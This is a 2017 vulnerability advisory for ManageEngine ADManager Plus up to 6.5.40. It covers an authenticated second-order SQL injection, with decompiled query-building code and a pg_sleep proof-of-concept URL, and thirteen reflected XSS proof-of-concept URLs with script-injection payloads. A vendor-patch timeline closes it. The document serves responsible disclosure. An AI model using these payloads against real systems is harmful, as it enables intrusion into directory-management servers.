ManagEnegine ADManager Plus 6.5.40 – Multiple Vulnerabilities

  • 作者: Mehmet Ince
    日期: 2017-01-08
  • 类别:
  • 来源:
    Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
    Application: ManagEnegine Admanager
    Remotely Exploitable: Yes
    Authentication Required: Yes
    Versions Affected: <= 6.5.40
    Technology: Java
    Vendor URL:
    Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
    Author: Mehmet Ince
    Date of found: 08 Jan 2017
    2. CREDIT
    Those vulnerabilities was identified during internal penetration test
    by Mehmet INCE from PRODAFT / INVICTUS.
    3. DETAILS
    3.1 Authenticated Second Order SQL Injection
    AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with / enpoint.
    start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)
    public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
    ... OMITTED ...
    this.attrbId = request.getParameter("attrId");
    this.tableName = request.getParameter("attrTabName");
    this.attrbName = request.getParameter("attrbColName");
    ... OMITTED ...
    catch (Exception e)
    It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
    And then deriveData function are going to be called with class variables that under the adversary control
    during complatedAction function execution.
    public void completedAction()
    if (this.updateDetails)
    ... OMITTED ...
    deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);
    ... OMITTED ...
    ... OMITTED ...
    deriveData function definition is as follow.
    public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
    ArrayList list = new ArrayList();
    RelationalAPI relationalAPI = RelationalAPI.getInstance();
    Connection connection = null;
    TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
    ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
    String dataType = colDef.getDataType();
    String selctAttrbCol_defaultValue = "'-'";
    if (!dataType.equals("CHAR")) {
    ... OMITTED ...
    String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
    if (!tableName.equalsIgnoreCase(this.baseTableName))
    String selctAttrbCol = tableName + "." + attrbName;
    String parentAttrbCol = this.baseTableName + ".domain_name";
    String parentTable = this.baseTableName;String childTable = tableName;
    String parentJoinCol = this.baseTableName + ".object_guid";
    String childJoinCol = tableName + ".object_guid";
    String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";
    query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
    ArrayList result = getResult(query, attrbName);
    ArrayList subList = new ArrayList();
    if (result.size() > 0)
    ... OMITTED ...
    if (subList.size() > 0)
    ... OMITTED ...
    ... OMITTED ...
    catch (Exception e)
    As you can see, database query built with user supplied variable without PDO/ORM.
    POC URL :,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
    Vulnerable Parameters: attrTabName, attrbColName
    Since whole process are being called as background job, there is no way to successfully exploitation
    with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
    exfiltrate data with DNS queries.(
    3.2 Reflected Cross-Site Scripting Issues
    Issue #1
    POC URL :{0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
    Parameters: domainName
    Issue #2
    POC URL:'"--></style></scRipt><scRipt>alert(0x03279A)</scRipt>&init=true
    Vulnerable Parameters: action
    Issue #3
    POC URL:'"--></style></scRipt><scRipt>alert(0x0328D0)</scRipt>
    Vulnerable Parameters: domainName
    Issue #4
    POC URL:'onload='alert(9)
    Vulnerable Parameters: waadAccId
    Issue #5
    POC URL:'"--></style></scRipt><scRipt>alert(0x02CB72)</scRipt>
    Vulnerable Parameters: actionType
    Issue #6
    POC URL:{0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"--></style></scRipt><scRipt>alert(0x013AEE)</scRipt>&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
    Vulnerable Parameters: objectClass, domainName
    Issue #7
    POC URL:'"--></style></scRipt><scRipt>alert(0x025A20)</scRipt>&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
    Vulnerable Parameters: domainName, id, container
    Issue #8
    POC URL:'"--></style></scRipt><scRipt>alert(0x00AE90)</scRipt>&tileName=Compliance Reports
    Vulnerable Parameters: reportTab, tileName, categoryId,
    Issue #9
    POC URL:'"--></style></scRipt><scRipt>alert(0x0376D4)</scRipt>&distinguishedName=DC=acme,DC=local
    Vulnerable Parameters: domainName, distinguishedName
    Issue #10
    POC URL:'"--></style></scRipt><scRipt>alert(0x041BA0)</scRipt>&permissionType=folder
    Vulnerable Parameters: permissionType, domianName
    Issue #11
    POC URL:,DC=local&textField='"--></style></scRipt><scRipt>alert(0x042402)</scRipt>
    Vulnerable Parameters: textField
    Issue #12
    POC URL:'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
    Vulnerable Parameters: defaultNamingContext,modelName, showDomain
    Issue #13
    POC URL:,DC=local&modifyType='"--></style></scRipt><scRipt>alert(0x0437B4)</scRipt>&beanName=undefined&type=single
    Vulnerable Parameters: modifyType, beanName
    06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
    07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
    07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
    08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
    09 Jan 2017 - Vendor notified.
    09 Jan 2017 - Vendor acknowledge the report.
    13 Jan 2017 - Vendor replied with patch.
    13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
    16 Jan 2017 - Advisory released (